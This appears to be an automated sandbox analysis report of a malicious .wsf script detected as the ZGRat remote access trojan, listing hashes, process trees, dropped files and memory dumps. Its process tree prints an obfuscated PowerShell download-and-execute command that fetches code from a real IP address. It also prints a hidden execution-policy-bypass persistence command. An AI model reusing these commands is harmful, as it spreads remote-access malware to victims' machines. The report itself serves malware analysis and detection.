Analysis

  • max time kernel
    145s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    23/01/2024, 12:29

General

  • Target

    f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf

  • Size

    144KB

  • MD5

    d98237f1eb423d002ec4431002532420

  • SHA1

    3c03b0e124cf15312a0cf43e1a74a3827b027e29

  • SHA256

    f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db

  • SHA512

    9f5b13ed4f562508635ead16e1976b05c79be6f94a6d95a8dac2ec538954c33e232682b3b2c1c637c1a928e8cc00c0589da834e41cd558df51c45eba01596a4f

  • SSDEEP

    3072:LvvvvvvvvvvvkAAAAAAAAAAABvvvvvvvvvvvkAAAAAAAAAAAyvvvvvvvvvvvkAAn:QAAAAAAAAAAASAAAAAAAAAAAdAAAAAA3

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.81.157.103/96/1.txt

Signatures

  • Detect ZGRat V1 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy(aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyGaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyCaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyM *aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyWaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy-aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyOaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy*aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy)NaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy.aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyWaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEybaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyCaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEylaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyiaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy).DaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyoaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEywaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEylaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyoaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyaaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEydaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEySaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyraUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyiaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyg(''http://185.81.157.103/96/1.txt'')').Replace('aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy','')|iex
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2744
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {B1F5D91D-0ECF-4114-BA10-3A0FC54202E9} S-1-5-21-928733405-3780110381-2966456290-1000:VTILVGXH\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1040
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2872
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\Users\Public\hich.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2540
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1316

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          25af3af8f786943d78326df1a84fd5df

          SHA1

          331aa1b11635d06c4ab3e292139e134c3f907113

          SHA256

          6058dfc7bbbaac27a77299952669de5145c7a3277dcf3e46f8af4e4eac87f29a

          SHA512

          d32a51522562117700a735e1af0ae279528a3e668ee753cb1b45dfe9422a3bc184a9ba4c94c12dc78c73b8324d3b392f5e1e478cfec066333e4170f342f06f90

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J8RF7N5OGWR5H3BR9IKQ.temp

          Filesize

          7KB

          MD5

          ce37b88de003d46be6fb52b722efd721

          SHA1

          9817eb666450d67d8d1a96ba8d99b760132bc856

          SHA256

          a9f696a8992cbb6984933405c456d49c2e97adc9e98a2f8ee6e88f6a7f5a5fd1

          SHA512

          f93ee23a0ab7b0574fba19eced9e7d835627c09d0ee0bfab7f4239c2f4b53ad374de3498c282776082b551c30e09b82c56aaca574eea8c23e44b33d86aa56ada

        • C:\Users\Public\hich.bat

          Filesize

          195B

          MD5

          6c8a34a94e068b809145df09acbe153c

          SHA1

          0ec5c6964c6ccc949af47297eb9794f8f1ee4724

          SHA256

          c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003

          SHA512

          41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805

        • C:\Users\Public\hich.ps1

          Filesize

          556KB

          MD5

          b13a273e32d5763a07d712e5209055fa

          SHA1

          633dd0e5f647fee13536f74247159cdb07d72273

          SHA256

          2c9c01e49757fa9a9732a3e9a1f06fb785afe6f288382458d4e6bbf0adee3486

          SHA512

          8b50f49dfd641467b7c11363d221c790e99b41aa4fdd97befb8c7deb1516584774690ab2b9ee4be951d162d9a56d57586af1d49d39a6f6f97a8a3b1fbc432908

        • C:\Users\Public\hich.vbs

          Filesize

          686B

          MD5

          741b5b0a474f0e0cd28fd880f68723c0

          SHA1

          4de5489c4e56882514b3ab432048200eae65f90d

          SHA256

          f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23

          SHA512

          3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54

        • memory/1316-33-0x0000000002450000-0x00000000024D0000-memory.dmp

          Filesize

          512KB

        • memory/1316-26-0x000000001B200000-0x000000001B4E2000-memory.dmp

          Filesize

          2.9MB

        • memory/1316-37-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

          Filesize

          9.6MB

        • memory/1316-36-0x0000000002450000-0x00000000024D0000-memory.dmp

          Filesize

          512KB

        • memory/1316-35-0x000000001B600000-0x000000001B634000-memory.dmp

          Filesize

          208KB

        • memory/1316-31-0x0000000002450000-0x00000000024D0000-memory.dmp

          Filesize

          512KB

        • memory/1316-32-0x0000000002450000-0x00000000024D0000-memory.dmp

          Filesize

          512KB

        • memory/1316-30-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

          Filesize

          9.6MB

        • memory/1316-28-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

          Filesize

          9.6MB

        • memory/1316-29-0x0000000002450000-0x00000000024D0000-memory.dmp

          Filesize

          512KB

        • memory/1316-27-0x00000000025E0000-0x00000000025E8000-memory.dmp

          Filesize

          32KB

        • memory/2744-11-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

          Filesize

          9.6MB

        • memory/2744-10-0x0000000002960000-0x00000000029E0000-memory.dmp

          Filesize

          512KB

        • memory/2744-7-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

          Filesize

          2.9MB

        • memory/2744-8-0x0000000002570000-0x0000000002578000-memory.dmp

          Filesize

          32KB

        • memory/2744-9-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

          Filesize

          9.6MB

        • memory/2744-13-0x0000000002960000-0x00000000029E0000-memory.dmp

          Filesize

          512KB

        • memory/2744-12-0x0000000002960000-0x00000000029E0000-memory.dmp

          Filesize

          512KB

        • memory/2744-18-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

          Filesize

          9.6MB

        • memory/2744-14-0x0000000002960000-0x00000000029E0000-memory.dmp

          Filesize

          512KB